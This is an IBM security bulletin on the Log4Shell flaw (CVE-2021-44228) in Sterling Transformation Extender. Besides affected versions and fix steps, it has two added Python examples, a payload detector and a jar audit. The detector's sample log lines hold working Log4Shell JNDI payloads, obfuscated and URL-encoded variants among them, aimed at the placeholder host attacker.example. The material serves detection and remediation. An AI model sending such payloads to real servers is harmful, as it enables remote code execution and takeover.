Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Transformation Extender (CVE-2021-44228)

## Summary

IBM Sterling Transformation Extender is affected by the Log4j 2 vulnerability CVE-2021-44228: an attacker who can control log messages or log message parameters can execute arbitrary code loaded from an LDAP server when message lookup substitution is enabled.

## Vulnerability Details

**CVEID:** [CVE-2021-44228]()
**DESCRIPTION:** Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure of its JNDI features to protect against attacker-controlled LDAP and other JNDI-related endpoints. By sending a specially crafted string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.
CVSS Base score: 10
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](https://exchange.xforce.ibmcloud.com/vulnerabilities/214921) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
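The exploit path described above depends on Log4j 2 resolving `${...}` lookups inside a log message before the `jndi:` prefix is examined, which is why attackers wrap the payload in nested `lower:`, `upper:` and `:-` default-value lookups and URL-encode it in request fields. The following detector is an added example, not part of IBM's bulletin or product: it undoes those layers the way Log4j's substitutor would (innermost lookup first, case-insensitive prefix) and then looks for a `jndi:` lookup and its URI scheme. The access-log lines and the host `attacker.example` are constructed for the demo.

```python
"""Spot Log4j 2 lookup payloads (CVE-2021-44228) in request fields or log lines, including nested/obfuscated forms."""
import re
from urllib.parse import unquote

# One lookup with no further ${...} nested inside it: resolve innermost first, as Log4j's substitutor does.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# A jndi lookup and its URI scheme (ldap, ldaps, rmi, dns, ...). Log4j matches lookup prefixes case-insensitively.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve_simple(body):
    """Resolve the lookups attackers use as building blocks; None means 'leave the text as is'."""
    expr, has_default, default = body.partition(":-")   # ${env:UNSET:-j} -> "j", ${::-j} -> "j"
    prefix, _, key = expr.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if has_default:
        # env/sys/etc. with a default: assume the variable is undefined (worst case) so the default survives
        return default
    return None


def normalize(text, max_rounds=20):
    """Collapse nested lookups until only a jndi lookup (or nothing resolvable) remains."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.lstrip().lower().startswith("jndi:"):
                return m.group(0)          # the payload itself: keep it intact for the final match
            resolved = _resolve_simple(body)
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def detect(field):
    """Return {'scheme', 'normalized'} if the field carries a jndi lookup after decoding, else None."""
    decoded = field
    for _ in range(2):                     # undo single and double URL encoding seen in access logs
        decoded = unquote(decoded)
    norm = normalize(decoded)
    m = JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "normalized": norm}


def scan_lines(lines):
    """Run detect() over log lines; returns (1-based line number, finding) pairs."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = detect(line)
        if hit:
            hits.append((n, hit))
    return hits


# CONSTRUCTED sample access-log lines (attacker.example is a reserved documentation name, not a real host).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [14/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:rmi://attacker.example/b}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:20 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.3 - - [14/Dec/2021:10:02:00 +0000] "GET /status?ts=${date:yyyy} HTTP/1.1" 200 "-" "monitor/1.0"',
]

if __name__ == "__main__":
    for n, hit in scan_lines(SAMPLE_LOG):
        print(f"line {n}: jndi via {hit['scheme']} -> {hit['normalized']}")
```

Matching only the literal `${jndi:` misses every obfuscated variant, so the normalization step is the point of the example; a lookup it cannot resolve (such as `${date:yyyy}`) is left in place and does not trigger a hit.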

## Affected Products and Versions

Affected Product(s) | Version(s)
---|---
IBM Sterling Transformation Extender | 10.0.3.0
IBM Sterling Transformation Extender | 10.1.0.0, 10.1.0.1
IBM Sterling Transformation Extender | 10.1.1.0

**NOT Applicable Releases:**

This security vulnerability is NOT applicable to the following releases of the product and all associated Industry and Enterprise Packs:

* WebSphere Transformation Extender 8.4.1.x (where x = { 0 | 1 | 2 | 3 | 4 | 5 })
* IBM Transformation Extender 9.0.0.x (where x = { 0 | 1 | 2 | 3 | 4 | 5 })
* IBM Transformation Extender 10.0.0.0

Also, not applicable to the following certified container releases:

* IBM Sterling Transformation Extender Certified Containers 10.0.0
* IBM Sterling Transformation Extender Certified Containers 10.0.1.x (where x = { 0 | 1 | 2 })
* IBM Sterling Transformation Extender Runtime Server 10.0.3

**NOTE:** This vulnerability applies only to environments where the Design Server and the Runtime REST API server are used to design and run maps and flows. All other design and runtime environments are not affected; in other words, Design Studio, Command Server, Launcher, RMI Server and API environments are not affected by this security vulnerability.

## Remediation/Fixes

Affected Product(s) | Version(s) | Link to Fix
---|---|---
IBM Sterling Transformation Extender | 10.0.3.0 | [Link]()
IBM Sterling Transformation Extender | 10.1.0.0, 10.1.0.1 | [Link]()
IBM Sterling Transformation Extender | 10.1.1.0 | [Link]()

**Applicable Platforms:**

* Microsoft Windows
* IBM AIX
* Linux (Intel)
* Linux on System z (zLinux)

## Workarounds and Mitigations

IBM strongly recommends that IBM Transformation Extender administrators apply the remediation. The remediation procedure differs by platform and affected version; follow the remediation process provided here as appropriate to your environment.

IBM Sterling Transformation Extender is affected by the Log4j 2.x vulnerability CVE-2021-44228. The other two Log4j 2.x vulnerabilities, CVE-2021-45046 and CVE-2021-45105, are not applicable, but as a precaution Log4j has been upgraded to version 2.17.0, which addresses all three.

For detailed information on the security vulnerabilities CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105, refer to the following links:

IBM Sterling Transformation Extender is NOT affected by the Log4j 1.x vulnerabilities CVE-2021-4104 and CVE-2019-17571. As a precaution, the vulnerable classes have been removed from the Log4j 1.x version distributed with the product.

For detailed information on the security vulnerabilities CVE-2021-4104 and CVE-2019-17571, refer to the following links:

**Remediation:**

In the IBM Sterling Transformation Extender product, Log4j has been upgraded to version 2.17.0 to cover the Log4j 2.x vulnerabilities, and the vulnerable classes JMSAppender and SocketServer have been removed from the distributed Log4j 1.x version as a precaution against the Log4j 1.x vulnerabilities.

Steps to remediate the vulnerabilities:

1. Download the Interim Fix for the version(s) used in your environment from IBM Fix Central
2. Extract the Interim Fix zip file in your environment, which includes Readme.txt file with instructions to follow
3. Follow the instructions listed in the Readme.txt file
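The Readme.txt in the Interim Fix is the authoritative procedure. What an administrator wants afterwards is a way to confirm that the install tree is actually in the state the remediation describes: every Log4j 2 core jar at 2.17.0 or later, and no JMSAppender or SocketServer class left in any Log4j 1.x jar. The audit below is an added example, not IBM's code or part of the fix: it walks a directory for jars (including jars embedded in other jars), reads the version from the manifest or the file name, and classifies each Log4j component. The jars it assesses in `demo()` are constructed fixtures, and the install path you pass to `scan_directory` is yours to supply; the bulletin names no path.

```python
"""Audit Log4j jars under an install tree against the state the Interim Fix is meant to leave them in."""
import io
import re
import zipfile
from pathlib import Path

# Threshold and class names taken from the bulletin's remediation text.
LOG4J2_FIXED = (2, 17, 0)
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J1_REMOVED = (
    "org/apache/log4j/net/JMSAppender.class",   # CVE-2021-4104
    "org/apache/log4j/net/SocketServer.class",  # CVE-2019-17571
)
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """First X.Y.Z in text as an int tuple, or None."""
    m = VERSION_RE.search(text or "")
    return tuple(int(g) for g in m.groups()) if m else None


def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF, or None when absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.lower().startswith("implementation-version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def assess_jar(name, data):
    """Classify one jar given as bytes; jars nested inside it (shaded or lib/ entries) are assessed too."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = manifest_version(zf) or parse_version(Path(name).name)
        if any(n.startswith("org/apache/logging/log4j/core/") for n in names):
            if version is not None and version >= LOG4J2_FIXED:
                status = "ok"
            elif JNDI_LOOKUP not in names:
                status = "mitigated"     # lookup class stripped by hand, but still below 2.17.0
            else:
                status = "vulnerable"    # CVE-2021-44228 reachable
            findings.append({"artifact": name, "component": "log4j-core", "version": version, "status": status})
        if any(n.startswith("org/apache/log4j/") for n in names):   # Log4j 1.x (the 1.2 bridge jar matches too)
            leftover = [c for c in LOG4J1_REMOVED if c in names]
            findings.append({"artifact": name, "component": "log4j-1.x", "version": version,
                             "status": "vulnerable" if leftover else "ok", "classes": leftover})
        for nested in sorted(n for n in names if n.endswith(".jar")):
            findings.extend(assess_jar(f"{name}!{nested}", zf.read(nested)))
    return findings


def scan_directory(root):
    """Walk an install tree for *.jar files; returns one finding per Log4j component found."""
    results = []
    for jar in sorted(Path(root).rglob("*.jar")):
        results.extend(assess_jar(str(jar), jar.read_bytes()))
    return results


def build_sample_jar(version, classes):
    """CONSTRUCTED fixture: a minimal jar with a manifest and empty class entries (not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        for c in classes:
            zf.writestr(c, b"")
    return buf.getvalue()


def demo():
    """Assess constructed jars covering the pre-fix, hand-mitigated, fixed, 1.x and nested cases."""
    core = "org/apache/logging/log4j/core/Logger.class"
    fixtures = {
        "log4j-core-2.14.1.jar": build_sample_jar("2.14.1", [core, JNDI_LOOKUP]),
        "log4j-core-2.14.1-stripped.jar": build_sample_jar("2.14.1", [core]),
        "log4j-core-2.17.0.jar": build_sample_jar("2.17.0", [core, JNDI_LOOKUP]),
        "log4j-1.2.17.jar": build_sample_jar("1.2.17", ["org/apache/log4j/Logger.class", *LOG4J1_REMOVED]),
        "log4j-1.2.17-fixed.jar": build_sample_jar("1.2.17", ["org/apache/log4j/Logger.class"]),
    }
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:   # an application jar embedding the vulnerable core
        zf.writestr("lib/log4j-core-2.14.1.jar", fixtures["log4j-core-2.14.1.jar"])
    fixtures["app.jar"] = outer.getvalue()
    return {name: assess_jar(name, data) for name, data in fixtures.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        for f in findings:
            print(f"{f['artifact']}: {f['component']} {f['version']} -> {f['status']}")
```

A `mitigated` result (JndiLookup removed by hand from a pre-2.17.0 core) is reported separately because that was a common emergency workaround in December 2021; it is not the state this bulletin's fix produces, so treat it as still needing the Interim Fix. Note that the check is for jars on disk only: a JVM that is still running with the old jars loaded must be restarted after the fix.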

## Get Notified about Future Security Bulletins

Subscribe to [My Notifications]() to be notified of important product support alerts like this.

### References

[Complete CVSS v3 Guide]( "Link resides outside of ibm.com" )
[On-line Calculator v3]( "Link resides outside of ibm.com" )


## Related Information

[IBM Secure Engineering Web Portal]()
[IBM Product Security Incident Response Blog]()

## Acknowledgement

## Change History

14 Dec 2021: Initial Publication

*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

## Disclaimer

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES "AS IS" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

## Document Location

Worldwide
